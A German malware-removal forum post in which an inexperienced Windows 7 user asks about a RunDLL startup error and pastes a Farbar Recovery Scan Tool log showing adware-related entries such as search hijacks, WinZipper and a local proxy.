| |
| |||||||
Log-Analyse und Auswertung: Windows 7: Fehlermeldung Systemstart "RunDLL: Problem beim Starten von C:\Users\aal\AppData\Local\Camera\Component\Bin\CameraComponent.DLL"Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML. |
 |
07.01.2016, 10:59
| #1 |
| |  Windows 7: Fehlermeldung Systemstart "RunDLL: Problem beim Starten von C:\Users\aal\AppData\Local\Camera\Component\Bin\CameraComponent.DLL" Hallo, ich bekomme seit Neuestem die obengenannte Fehlermeldung, die ich einfach nicht weg bekomme. Ist das etwas über das ich mir Sorgen machen sollte? Ich gebe zu, dass ich sehr unerfahren am PC und insbesondere mit derartigen Dingen wie "Viren" oder "Malware" bin. Daher wäre ich für jede (verständliche) Hilfe dankbar. Ansonsten hätte ich aber noch einen Nachbarn, der mich unterstützt. Dieser hat mir auch geholfen die LOG-Files mit FRST64 zu erstellen: FRST.TXT Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:06-01-2015
durchgeführt von aal (Administrator) auf AAL-PC (07-01-2016 10:40:47)
Gestartet von C:\Users\aal\Downloads
Geladene Profile: aal (Verfügbare Profile: aal)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: "C:\Program Files (x86)\Deutsche Telekom AG\Browser 7\Browser7.exe" -osint -url "%1")
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Taiwan Shui Mu Chih Ching Technology Limited) C:\Program Files (x86)\WinZipper\winzipersvc.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.11.266\SSScheduler.exe
(T-Systems International GmbH) C:\Program Files (x86)\T-Home\Dialerschutz-Software\Defender64.exe
(Deutsche Telekom AG) C:\Program Files (x86)\Deutsche Telekom AG\Browser 7\Browser7.exe
(T-Systems International GmbH) C:\Program Files (x86)\T-Home\Dialerschutz-Software\DFInject64.exe
(Acer Incorporated) C:\Program Files (x86)\eMachines\Registration\GregHSRW.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
(Acer) C:\Program Files\eMachines\eMachines Updater\UpdaterService.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Malwarebytes Corporation ) C:\Users\aal\Desktop\Rescue\mbam-setup-2.0.2.1012.exe
() C:\Users\aal\AppData\Local\Temp\is-Q7BEJ.tmp\mbam-setup-2.0.2.1012.tmp
(Malwarebytes Corporation ) C:\Users\aal\Desktop\Rescue\mbam-setup-2.0.2.1012.exe
() C:\Users\aal\AppData\Local\Temp\is-2RA99.tmp\mbam-setup-2.0.2.1012.tmp
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 10.0\Reader\reader_sl.exe
==================== Registry (Nicht auf der Ausnahmeliste) ===========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [7981088 2009-07-20] (Realtek Semiconductor)
HKLM-x32\...\Run: [T-Home Dialerschutz-Software] => C:\Program Files (x86)\T-Home\Dialerschutz-Software\Defender64.exe [1974408 2010-03-29] (T-Systems International GmbH)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [7021880 2015-12-29] (AVAST Software)
HKU\S-1-5-21-2436113304-3946048090-3963370519-1000\...\MountPoints2: E - E:\LaunchU3.exe -a
HKU\S-1-5-21-2436113304-3946048090-3963370519-1000\...\MountPoints2: {3754e249-a48a-11e5-b41a-00251165d6e1} - E:\iLinker.exe
HKU\S-1-5-21-2436113304-3946048090-3963370519-1000\...\MountPoints2: {8cc10e6c-92d1-11e1-afc5-00251165d6e1} - E:\LaunchU3.exe -a
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2013-03-20] (Microsoft Corporation)
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2015-12-29] (AVAST Software)
ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360\Engine64\6.4.0.9\buShell.dll [2012-07-26] (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360\Engine64\6.4.0.9\buShell.dll [2012-07-26] (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360\Engine64\6.4.0.9\buShell.dll [2012-07-26] (Symantec Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2015-12-29]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.266\SSScheduler.exe (McAfee, Inc.)
BootExecute: autocheck autochk * sdnclean64.exe
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
ProxyEnable: [.DEFAULT] => Proxy ist aktiviert.
ProxyServer: [.DEFAULT] => http=127.0.0.1:50027;https=127.0.0.1:50027
Hosts: 0.0.0.1 mssplus.mcafee.com
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\Parameters: [NameServer] 82.163.142.3
Tcpip\..\Interfaces\{6D90B802-E171-44A6-A44E-F2C69DE244DD}: [NameServer] 199.203.131.145,82.163.143.167
Tcpip\..\Interfaces\{6D90B802-E171-44A6-A44E-F2C69DE244DD}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{87DFD6CF-3FB2-4C54-87B7-7B5D56EC4E47}: [DhcpNameServer] 192.168.2.1
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
URLSearchHook: HKU\S-1-5-21-2436113304-3946048090-3963370519-1000 - (Kein Name) - {5bcf818d-78c8-41b8-ba89-65c5fdac4fc4} - Keine Datei
SearchScopes: HKLM -> DefaultScope {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL =
SearchScopes: HKLM-x32 -> DefaultScope {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://v9.com/web?type=ds&ts=1450262935&from=zzgbkk123&uid=3219913727_67194_e489a0b5&z=1733190edc3b0367db56424g2z2w6e2o0q8oat0c1g&q={searchTerms}
SearchScopes: HKLM-x32 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://v9.com/web?type=ds&ts=1450262935&from=zzgbkk123&uid=3219913727_67194_e489a0b5&z=1733190edc3b0367db56424g2z2w6e2o0q8oat0c1g&q={searchTerms}
SearchScopes: HKLM-x32 -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW
SearchScopes: HKU\S-1-5-21-2436113304-3946048090-3963370519-1000 -> DefaultScope {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://v9.com/web?type=ds&ts=1450262935&from=zzgbkk123&uid=3219913727_67194_e489a0b5&z=1733190edc3b0367db56424g2z2w6e2o0q8oat0c1g&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2436113304-3946048090-3963370519-1000 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://v9.com/web?type=ds&ts=1450262935&from=zzgbkk123&uid=3219913727_67194_e489a0b5&z=1733190edc3b0367db56424g2z2w6e2o0q8oat0c1g&q={searchTerms}
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2015-12-29] (AVAST Software)
BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll [2009-02-06] (Zeon Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2015-12-29] (AVAST Software)
Toolbar: HKU\S-1-5-21-2436113304-3946048090-3963370519-1000 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Keine Datei
DPF: HKLM-x32 {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} hxxp://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: HKLM-x32 {1ABA5FAC-1417-422B-BA82-45C35E2C908B} hxxp://kitchenplanner.ikea.com/DE/Core/Player/2020PlayerAX_IKEA_Win32.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxps://fpdownload.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_12_0_0_70.dll [2014-03-07] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_12_0_0_70.dll [2014-03-07] ()
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2009-07-10] (Microsoft Corporation)
FF Plugin-x32: @protectdisc.com/NPMPDRM -> C:\Program Files (x86)\Common Files\mpDRM\NPMPDRM.dll [2010-02-03] ( )
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-09-24] (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [{7BA52691-1876-45ce-9EE6-54BCB3B04BBC}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\Norton\coFFPlgn => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_6.0.0.145\IPSFFPlgn
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_6.0.0.145\IPSFFPlgn [2013-02-10] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_6.0.0.145\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_6.0.0.145\coFFPlgn [2013-02-10] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2015-12-29]
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: Avast SafePrice - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2015-12-29]
Chrome:
=======
CHR Profile: C:\Users\aal\AppData\Local\Google\Chrome\User Data\Default
CHR HKU\S-1-5-21-2436113304-3946048090-3963370519-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bakijjialdiiboeaknfpmflphhmljfkd] - C:\Users\aal\AppData\Local\newhb2.crx [2013-10-03]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2015-12-29]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360\Engine\6.4.0.9\Exts\Chrome.crx <nicht gefunden>
==================== Dienste (Nicht auf der Ausnahmeliste) ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [226440 2015-12-29] (AVAST Software)
S3 Browser7Maintenance; C:\Program Files (x86)\Browser 7 Maintenance Service\maintenanceservice.exe [107520 2015-01-01] (Deutsche Telekom AG) [Datei ist nicht signiert]
S3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [245760 2010-01-25] (Brother Industries, Ltd.) [Datei ist nicht signiert]
R2 DFSVC; C:\Program Files (x86)\T-Home\Dialerschutz-Software\DFInject64.exe [376832 2009-10-21] (T-Systems International GmbH) [Datei ist nicht signiert]
R2 Greg_Service; C:\Program Files (x86)\eMachines\Registration\GregHSRW.exe [1150496 2009-08-28] (Acer Incorporated)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.266\McCHSvc.exe [289256 2015-12-02] (McAfee, Inc.)
S2 N360; C:\Program Files (x86)\Norton 360\Engine\6.4.0.9\ccSvcHst.exe [138272 2012-06-16] (Symantec Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [Datei ist nicht signiert]
R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [144672 2010-03-08] (Nuance Communications, Inc.)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [Datei ist nicht signiert]
R2 Updater Service; C:\Program Files\eMachines\eMachines Updater\UpdaterService.exe [240160 2009-07-04] (Acer)
R2 winzipersvc; C:\Program Files (x86)\WinZipper\winzipersvc.exe [711344 2015-12-09] (Taiwan Shui Mu Chih Ching Technology Limited) <==== ACHTUNG
S2 bc6adb3f; "C:\Windows\system32\rundll32.exe" "c:\Program Files (x86)\LiveReader\LiveReader.dll",serv
===================== Treiber (Nicht auf der Ausnahmeliste) ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [28656 2015-12-29] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [97648 2015-12-29] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2015-12-29] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65224 2015-12-29] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1055560 2015-12-29] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [451040 2015-12-29] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [155304 2015-12-29] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [273784 2015-12-29] (AVAST Software)
S3 athrusb; C:\Windows\System32\DRIVERS\athrxusb.sys [1061888 2007-08-17] (Atheros Communications, Inc.)
R1 BHDrvx64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_6.0.0.145\Definitions\BASHDefs\20130116.013\BHDrvx64.sys [1388120 2013-01-16] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\0604000.009\ccSetx64.sys [167072 2012-06-07] (Symantec Corporation)
R3 DFSYS; C:\Program Files (x86)\T-Home\Dialerschutz-Software\DFSYS64.SYS [17952 2009-10-15] (T-Systems International GmbH)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [484512 2013-01-14] (Symantec Corporation)
R1 IDSVia64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_6.0.0.145\Definitions\IPSDefs\20130124.001\IDSvia64.sys [513184 2012-09-06] (Symantec Corporation)
S3 NAVENG; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_6.0.0.145\Definitions\VirusDefs\20130126.007\ENG64.SYS [126192 2013-01-24] (Symantec Corporation)
S3 NAVEX15; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_6.0.0.145\Definitions\VirusDefs\20130126.007\EX64.SYS [2087664 2013-01-24] (Symantec Corporation)
R3 SipIMNDI; C:\Windows\System32\DRIVERS\SipIMNDI64.sys [28192 2009-10-15] (T-Systems International GmbH)
S3 SRTSP; C:\Windows\System32\Drivers\N360x64\0604000.009\SRTSP64.SYS [737952 2012-07-06] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\0604000.009\SRTSPX64.SYS [37536 2012-07-06] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\N360x64\0604000.009\SYMDS64.SYS [451192 2011-08-15] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\N360x64\0604000.009\SYMEFA64.SYS [1129120 2012-05-22] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [175736 2012-05-05] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\0604000.009\Ironx64.SYS [190072 2011-11-16] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\N360x64\0604000.009\SYMNETS.SYS [405624 2011-11-16] (Symantec Corporation)
U5 VWiFiFlt; C:\Windows\System32\Drivers\VWiFiFlt.sys [59904 2009-07-14] (Microsoft Corporation)
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2016-01-07 10:40 - 2016-01-07 10:41 - 00019037 _____ C:\Users\aal\Downloads\FRST.txt
2016-01-07 10:40 - 2016-01-07 10:40 - 02370560 _____ (Farbar) C:\Users\aal\Downloads\FRST64.exe
2016-01-07 10:40 - 2016-01-07 10:40 - 00000000 ____D C:\FRST
2016-01-07 10:35 - 2016-01-07 10:35 - 00001115 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2016-01-07 10:35 - 2016-01-07 10:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware
2016-01-07 10:35 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-01-07 10:35 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-01-07 10:35 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2016-01-07 10:32 - 2016-01-07 10:35 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware
2016-01-06 09:00 - 2016-01-06 09:00 - 00460392 _____ C:\Users\aal\Downloads\20160104_36,07-_01_Strom.pdf
2016-01-05 19:04 - 2016-01-05 19:04 - 498768068 _____ C:\Windows\MEMORY.DMP
2016-01-05 19:04 - 2016-01-05 19:04 - 00992584 _____ C:\Windows\Minidump\010516-34897-01.dmp
2016-01-05 07:29 - 2016-01-05 07:29 - 00021909 _____ C:\Users\aal\Desktop\Paketschein_46005004469_Reinecke_050116.pdf
2016-01-05 07:28 - 2016-01-05 07:28 - 00017878 _____ C:\Users\aal\Downloads\Paketschein_46005004469_Reinecke_050116.pdf
2016-01-05 07:18 - 2016-01-05 07:18 - 00045107 _____ C:\Users\aal\Downloads\Kontoauszug_3223361__Nr.0012016_vom_04.01.2016_20160105071847.pdf
2016-01-05 07:18 - 2016-01-05 07:18 - 00043408 _____ C:\Users\aal\Downloads\Mitteilung_3223361_vom_04.01.2016_20160105071840.pdf
2016-01-04 07:52 - 2016-01-04 07:52 - 00047267 _____ C:\Users\aal\Downloads\Kontoauszug_3223361__Nr.0062015_vom_31.12.2015_20160104075202.pdf
2015-12-30 20:51 - 2015-12-30 20:51 - 01110792 _____ (Symantec Corporation) C:\Users\aal\Downloads\NSBUDownloader(1).exe
2015-12-30 10:38 - 2015-12-30 10:38 - 00028258 _____ C:\Users\aal\Downloads\Statement_Dec 2015.pdf
2015-12-30 08:04 - 2015-12-30 08:04 - 03835783 _____ C:\Users\aal\Downloads\bad_programm_2015-2016.pdf
2015-12-30 07:40 - 2015-12-30 07:40 - 00428296 _____ C:\Users\aal\Downloads\Est_Fertigbaeder_Modellbeispiele.pdf
2015-12-30 07:28 - 2015-12-30 07:28 - 02988214 _____ C:\Users\aal\Downloads\Fertigbad_Superlight.pdf
2015-12-29 14:40 - 2015-12-29 14:44 - 00000000 ____D C:\Program Files\CCleaner
2015-12-29 14:33 - 2015-12-29 14:33 - 00000000 ____D C:\Users\aal\AppData\Roaming\VSRevoGroup
2015-12-29 14:25 - 2015-12-29 14:25 - 01110792 _____ (Symantec Corporation) C:\Users\aal\Downloads\NSBUDownloader.exe
2015-12-29 14:18 - 2015-12-30 21:08 - 00000000 ____D C:\Users\aal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Norton
2015-12-29 14:18 - 2015-12-30 20:53 - 00001311 _____ C:\Users\aal\Desktop\Norton Installation Files.lnk
2015-12-29 14:18 - 2015-12-29 14:18 - 00000000 ____D C:\Users\Public\Downloads\Norton
2015-12-29 13:54 - 2015-12-29 15:17 - 00000000 ____D C:\Users\aal\Desktop\Rescue
2015-12-29 13:38 - 2015-12-29 13:34 - 00386096 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2015-12-29 13:35 - 2016-01-04 15:04 - 00004182 _____ C:\Windows\System32\Tasks\avast! Emergency Update
2015-12-29 13:35 - 2015-12-29 13:35 - 00451040 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2015-12-29 13:35 - 2015-12-29 13:35 - 00097648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2015-12-29 13:35 - 2015-12-29 13:35 - 00001931 _____ C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2015-12-29 13:35 - 2015-12-29 13:35 - 00000000 ____D C:\Windows\System32\Tasks\AVAST Software
2015-12-29 13:35 - 2015-12-29 13:35 - 00000000 ____D C:\Users\aal\AppData\Roaming\AVAST Software
2015-12-29 13:35 - 2015-12-29 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2015-12-29 13:35 - 2015-12-29 13:34 - 01055560 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2015-12-29 13:35 - 2015-12-29 13:34 - 00273784 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2015-12-29 13:35 - 2015-12-29 13:34 - 00155304 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2015-12-29 13:35 - 2015-12-29 13:34 - 00093528 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2015-12-29 13:35 - 2015-12-29 13:34 - 00065224 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2015-12-29 13:35 - 2015-12-29 13:34 - 00028656 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2015-12-29 13:34 - 2015-12-29 13:34 - 00043112 _____ (AVAST Software) C:\Windows\avastSS.scr
2015-12-29 13:33 - 2015-12-29 13:33 - 00000000 ____D C:\ProgramData\AVAST Software
2015-12-29 13:33 - 2015-12-29 13:33 - 00000000 ____D C:\Program Files\AVAST Software
2015-12-29 13:08 - 2015-12-29 13:08 - 00000000 ____D C:\Users\aal\AppData\Roaming\AVG
2015-12-29 13:04 - 2015-12-29 13:04 - 00000000 ____D C:\Users\aal\AppData\Local\Avg
2015-12-29 13:03 - 2015-12-29 13:22 - 00000000 ____D C:\ProgramData\AVG
2015-12-29 12:03 - 2015-12-29 12:03 - 00000000 ____D C:\ProgramData\Malwarebytes
2015-12-29 11:56 - 2015-12-29 13:35 - 00000000 ____D C:\Program Files\Common Files\AV
2015-12-29 11:55 - 2015-12-29 11:55 - 00000000 ____D C:\Windows\System32\Tasks\Safer-Networking
2015-12-29 11:54 - 2015-12-29 12:03 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
